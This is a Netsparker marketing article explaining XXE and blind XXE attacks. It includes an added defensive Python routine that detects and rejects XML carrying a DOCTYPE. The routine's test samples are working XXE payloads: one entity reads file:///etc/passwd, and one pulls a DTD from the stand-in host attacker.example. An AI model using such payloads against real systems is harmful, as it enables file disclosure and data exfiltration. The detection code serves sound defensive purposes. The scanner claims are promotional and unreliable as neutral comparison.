Why You Need to Scan For XXE Flaws

Many web applications use XML to store and access data. XXE is a vulnerability in the way applications parse XML that can be as dangerous as cross-site scripting. The good news is that you can detect it with an automated solution such as Netsparker.


Though perhaps not as well known as issues such as cross-site scripting (XSS), cross-site request forgery (CSRF), and injection vulnerabilities, an XML External Entity (XXE) attack can be just as damaging. In fact, OWASP recognized this attack vector and added it to its Top 10 list of web application vulnerabilities in 2017. As part of your web application security program, you need to know what XXE is, how it can affect your environment, and how you can protect your websites from XXE attacks.

What Is XXE?

XXE takes advantage of a web application whose XML parser resolves external entities, that is, fetches content from other documents and URIs named in the XML; this functionality is enabled by default in many popular XML parsers. In a traditional XXE attack, the attacker tricks the victim into clicking a link that causes the application to parse a malicious XML document the attacker has written. If the application is vulnerable, its parser processes that XML and follows the entity definitions and markup it contains.

Those instructions can be as varied as any web application vulnerability that allows an attacker to run arbitrary commands or code. As stated in the 2017 OWASP Top 10, "External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks."

The OOB-XXE Variant

There is another variation called an out-of-band XML external entity (OOB-XXE) attack, or blind XXE, which is a kind of server-side request forgery (SSRF) vulnerability. In this variant, the attacker does not receive the file or response directly from the target web server. Instead, they send XML input whose entity definitions coerce the target server into making an HTTP request to a separate server controlled by the attacker, carrying the targeted data with it. The attacker then retrieves the data from their own server.

What Is At Stake?

The consequences of XXE can be far-reaching. Depending on the web application and the nature of the vulnerability, a broad range of sensitive data can be at risk of compromise in an XXE attack.

Examples of goals of XXE attacks include:

  • Reading the /etc/passwd file in order to enumerate users and potentially crack poorly encrypted passwords, by retrieving the file through a URI such as file:///etc/passwd.
  • Denial of service, as a result of entity definitions in the parsed XML that exhaust the available memory.
  • Port scanning on the internal network, in order to map out IP addresses on the network and identify servers and services hosted behind the web server.
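The parser behaviour described under "What Is XXE?", the OOB variant, and the three goals listed above all hinge on one thing: the application hands untrusted XML, including its DTD, to a parser that is willing to resolve external entities. The following is an added example written for this page from the defender's side; it is not Netsparker's code or part of the original article. It uses only Python's standard-library expat bindings to inspect a document's DTD without resolving anything, then refuses any document that carries a DOCTYPE before it reaches the real parser. The sample documents, the placeholder hostname attacker.example, and the names inspect_xml, parse_untrusted and XmlInspection are constructed for this illustration.

```python
"""Inspect untrusted XML for XXE indicators before it reaches the real parser.

Added example (not Netsparker's code). Standard library only. The inspection
parser never resolves an external entity: every reference expat asks us to
fetch is refused, so no file:// or http:// access happens during inspection.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# Constructed samples for the demonstration (not captured traffic).
BENIGN_XML = b'<?xml version="1.0"?><order id="42"><item sku="A1"/></order>'

# In-band XXE shape: an external general entity pointing at a local file.
INBAND_XXE = (b'<?xml version="1.0"?>'
              b'<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
              b'<order>&xxe;</order>')

# Out-of-band (blind) XXE shape: a parameter entity that would pull a DTD
# from an outside host. attacker.example is a placeholder hostname.
OOB_XXE = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE order [ <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd; ]>'
           b'<order/>')


class XmlInspection:
    """What the inspection parser saw in the document's DTD."""

    def __init__(self):
        self.has_doctype = False
        self.external_entities = []   # (entity name, system or public id)
        self.internal_entities = 0    # value-only entities (nesting them is the DoS case)
        self.refused_references = []  # ids expat asked us to fetch and we refused

    @property
    def risky(self):
        # Strict policy matching common hardening advice: any DOCTYPE is rejected,
        # which covers file disclosure, OOB fetches and entity-expansion DoS alike.
        return self.has_doctype


def inspect_xml(data: bytes) -> XmlInspection:
    report = XmlInspection()
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report.has_doctype = True
        if sysid or pubid:  # an external DTD subset is itself an outbound fetch
            report.external_entities.append(("<external DTD subset>", sysid or pubid))

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid or pubid:
            report.external_entities.append((name, sysid or pubid))
        else:
            report.internal_entities += 1

    def on_external_ref(context, base, sysid, pubid):
        report.refused_references.append(sysid or pubid)
        return 0  # 0 aborts the parse; a non-zero return would let expat continue

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # an aborted or malformed parse still leaves the report usable
    return report


def parse_untrusted(data: bytes) -> ET.Element:
    """Reject any document carrying a DTD, then parse with ElementTree."""
    report = inspect_xml(data)
    if report.risky:
        raise ValueError("rejected XML with DOCTYPE; external entities: %r"
                         % report.external_entities)
    return ET.fromstring(data)


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_XML), ("in-band", INBAND_XXE), ("oob", OOB_XXE)):
        r = inspect_xml(doc)
        print(label, "doctype=%s external=%s refused=%s"
              % (r.has_doctype, r.external_entities, r.refused_references))
```

The report from inspect_xml is what you would log or alert on: an external entity declaration with a file:// system id matches the first goal in the list, an http:// one matches the OOB pattern, and a large count of internal entities is the signature of expansion-based denial of service. Rejecting every DOCTYPE is blunt but is the setting most parser-hardening guides recommend for input from outside.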

As with most attacks, the targets are limited only by the attacker's resourcefulness and patience, and the data behind your vulnerable web application.

Identifying XXE Flaws

The first step to ensuring your web applications are not vulnerable to an XXE attack is to identify any of your business's applications that are vulnerable to it. To do so you need a web application security scanner that reliably identifies a full range of vulnerabilities, without hiding these critical and useful results behind a mountain of false positives. You need Netsparker.

No matter what platforms your web applications are built with and run on, Netsparker can scan them and identify the full spectrum of both server-side and client-side vulnerabilities.

Netsparker is also the most accurate web application vulnerability scanner on the market, as proven when independent security tool tester Shay Chen tested the most popular web application scanners, both commercial and open source. The benchmark was designed to reflect real technologies and vulnerabilities in the modern threat landscape. Only Netsparker found 100% of the vulnerabilities in the test, and it did so without reporting any false positives.

Netsparker is the only tool with Proof-Based Scanning™. Every finding in our web security scan reports comes with proof of exploit: you see exactly what HTTP requests triggered the vulnerability, and what information was compromised as a result. Your security team easily sees the vulnerabilities and their impact, and no longer has to spend hours or days validating false positives. And, if you develop your own applications, software developers can easily isolate what part of the business logic is flawed and exploitable. These dead accurate results streamline every step of the web application security process.

Try Netsparker Today

Contact us today to begin your 15-day free trial of the Netsparker Web Application Security Scanner. See how easy we can make it to identify web security issues, including XXE vulnerabilities. And, see how much easier maintaining a secure web presence can be when your scanner is giving you the most comprehensive and thorough results on the market.

What our customers are saying

"I had the opportunity to compare external expertise reports with Netsparker ones. Netsparker was better, finding more breaches. It’s a very good product for me."
"As opposed to other web application scanners, Netsparker is very easy to use. An out of the box installation can detect more vulnerabilities than any other scanner."
"We chose Netsparker because it is more tailored to web application security and has features that allow the university to augment its web application security needs."